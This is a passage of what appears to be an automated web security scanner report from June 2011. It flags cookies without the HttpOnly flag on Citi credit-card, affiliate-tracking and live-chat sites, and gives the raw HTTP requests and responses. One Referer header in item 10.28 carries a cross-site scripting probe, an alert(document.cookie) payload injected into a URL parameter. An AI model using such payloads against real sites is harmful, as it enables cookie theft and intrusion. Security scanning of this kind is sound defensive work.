CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=42944&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308312773&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&VTIAS=0&VTILNK=0&SID=36CEB96C744948E481109575676DCE63&VTIVEN=1805; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:14:06 GMT
Location: http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=E757957DB08144938AD7A32A94698E09
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: PCCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: PXCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=43153&VTIPUB=705&TX=1308312846&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&VTIVEN=1805&SID=E757957DB08144938AD7A32A94698E09; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
Set-Cookie: ATC9=6235d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199P9Ucc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308312846129; expires=Fri, 17-Jun-2011 17:15:06 GMT; path=/
Date: Fri, 17 Jun 2011 12:14:06 GMT
Connection: close

10.20. http://citi.bridgetrack.com/usc/_spredir.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_spredir.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
ATC9=58386d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199P9Pcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0ccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=42944&VTIPUB=705&TX=1308312841&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&VTIVEN=1805&SID=ADDC737F3B2E44C49AC3A2E84E0E6C9A; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312841117; expires=Fri, 17-Jun-2011 17:15:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=11&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVMC0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6=T=1308307229238; TVMC0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6=T=1308307241722; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6=T=1308307241791; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6=T=1308312772545; CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; CitiBT%5F9=VTIVEN=1805&SID=36CEB96C744948E481109575676DCE63&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&TX=1308312773&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTITRF=42944&VTIPUB=705&VTI3PTY=&VTIEML=0; ATC9=49814d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0ccccccccc; CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312773218

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:14:01 GMT
Location: http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529047&ProspectID=ADDC737F3B2E44C49AC3A2E84E0E6C9A
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: PCCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: PXCNaN=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=45D549836F0B45EFACB5750C836B191C; path=/
Set-Cookie: ATC9=58386d199JQ4cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199JQDcc4QMc7AF0cM1c1ODc1P95c2U7Tcc1FV1cccccccccd199JQQcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199JU5cc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2POAcc19U1cccccccccd199P7Lcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0cccccccccd199P7Qcc4O6c7AF0cM1c1ODc1P90c2POBcc1A4Hcccccccccd199P9Pcc4O6c7AF0cM1c1ODc1P90c2PO9cc19U0ccccccccc; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBT%5F9=VTI3PTY=&VTIEML=0&VTITRF=42944&VTIPUB=705&TX=1308312841&VTIWAV=0&VTISEG=0&VTICAT=0&VTIPRC=0&VTIVAR=0&VTICHN=0&VTIPRD=0&VTICON=0&VTILNK=0&VTIAS=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&VTIVEN=1805&SID=ADDC737F3B2E44C49AC3A2E84E0E6C9A; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=7FB79451E8024624A0A2C71D9E384ACA; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: TVMC0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6=T=1308312841117; expires=Fri, 17-Jun-2011 17:15:00 GMT; path=/
Date: Fri, 17 Jun 2011 12:14:01 GMT
Connection: close

10.21. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 11:59:56 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A224261%3A1124cf812011e906cc17069a599054; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 11:59:56 GMT; Path=/
lsn_track=UmFuZG9tSVYRizqjZXnGQxDToyno5A9RBlx%2Fm1pnukrSaDAZFqlMAg5QwCbNuuMthrS4noYNoIWwbsKdQsozzg%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 11:59:56 GMT; Path=/
lsclick_mid1335="2011-06-17 11:59:56.312|EhraRx8K%2FBE-BQHxeK4lVk5JnoYun3f8jw"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 11:59:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.22. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 12:00:31 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A227478%3A1118b79220110c061317070b00ed04; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 12:00:31 GMT; Path=/
lsn_track=UmFuZG9tSVYkVQ7zZ50sMP6zzgyOXYFH4NxsDcK9L89L9V6GAZUtq7w%2Fv0c5e2Gg3c6Q8Ny5aiajimfEubz9lw%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 12:00:31 GMT; Path=/
lsclick_mid2291="2011-06-17 12:00:31.668|EhraRx8K_BE-Gq0WXXscoeFiJWMkyMbiLA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 12:00:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.23. http://creditcards.citicards.com/usc/_bt_appredir.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/_bt_appredir.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/_bt_appredir.asp?TID=17781&BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT=GUID=D1F4D666B48E4BCBA934AE2EE33EE2AA; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_DiamondPreferred_MC_21monthBTP%7C1308314708657%3B; CitiBT%5F9=; CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:15:08 GMT
Location: http://citi.bridgetrack.com/usc/_bt_appredir.asp?TID=17781&BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBT%5F9=; expires=Mon, 11-Jun-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/
Date: Fri, 17 Jun 2011 12:15:07 GMT
Connection: close

10.24. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/MC/external/affiliate/Mar2011/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529043&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=11&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:13:02 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/
Date: Fri, 17 Jun 2011 12:13:01 GMT
Connection: close
Content-Length: 5829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

10.25. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734 HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=11&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:13:30 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/
Date: Fri, 17 Jun 2011 12:13:30 GMT
Connection: close
Content-Length: 5761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

10.26. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=11&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_PlatSelect_Visa_21monthBTP%7C1308314576185%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:14:16 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/
Date: Fri, 17 Jun 2011 12:14:15 GMT
Connection: close
Content-Length: 10853

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Citi® Diamond Preferred® Card</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso
...[SNIP]...

10.27. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1308311947421%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Sat, 16-Jun-2012 11:59:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.28. http://s46.sitemeter.com/js/counter.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

IP=173%2E193%2E214%2E243; path=/js

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=s46cccgblog HTTP/1.1
Host: s46.sitemeter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 12:11:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7264
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:21:39 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...

10.29. http://sales.liveperson.net/hc/32528459/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/32528459/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=8195223722925837910; path=/hc/32528459
HumanClickACTIVE=1308311975001; expires=Sat, 18-Jun-2011 11:59:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/32528459/?&site=32528459&cmd=mTagKnockPage&lpCallId=630825764266-999114822595&protV=20&lpjson=1&id=7998289160&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sb-sales-english%7Cnull%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1308311533149; ASPSESSIONIDAQSCRRRS=PBNCLIECMNLIHJBBIOIPPANI

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8195223722925837910; path=/hc/32528459
Set-Cookie: HumanClickACTIVE=1308311975001; expires=Sat, 18-Jun-2011 11:59:35 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 11:59:35 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28177

lpConnLib.Process({"ResultSet": {"lpCallId":"630825764266-999114822595","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.30. http://sales.liveperson.net/hc/32528459/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/32528459/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1308312148817; expires=Sat, 18-Jun-2011 12:02:28 GMT; path=/
HumanClickSiteContainerID_32528459=STANDALONE; path=/hc/32528459
LivePersonID=-16101514677756-1308311975:-1:1308311999:-1:-1; expires=Sat, 16-Jun-2012 12:02:28 GMT; path=/hc/32528459; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/32528459/?&site=32528459&cmd=mTagKnockPage&lpCallId=693976194597-483333286596&protV=20&lpjson=1&id=2065431685&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sb-sales-english%7Cnull%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6682965583658191868; LivePersonID=-16101514677756-1308311975:-1:-1:-1:-1; HumanClickSiteContainerID_32528459=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQSCRRRS=PBNCLIECMNLIHJBBIOIPPANI; HumanClickACTIVE=1308311973932

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:02:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1308312148817; expires=Sat, 18-Jun-2011 12:02:28 GMT; path=/
Content-Type: application/x-javascript
